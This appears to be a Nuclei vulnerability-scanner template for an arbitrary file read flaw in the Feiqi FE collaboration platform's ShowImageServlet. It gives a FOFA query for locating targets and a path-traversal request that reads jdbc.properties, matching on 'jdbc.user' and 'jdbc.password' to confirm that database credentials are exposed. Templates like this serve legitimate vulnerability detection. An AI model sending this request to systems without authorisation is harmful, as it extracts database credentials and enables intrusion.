id: feiqi-fe-showimageservlet-fileread

info:
  name: 飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞
  author: peiqi
  severity: high
  description: |
    飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中敏感文件
    FOFA: "flyrise.stopBackspace.js"
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/飞企互联/飞企互联%20FE业务协作平台%20ShowImageServlet%20任意文件读取漏洞.html
  tags: feiqi,fileread

http:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print"
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'jdbc.user'
          - 'jdbc.password'
        condition: and
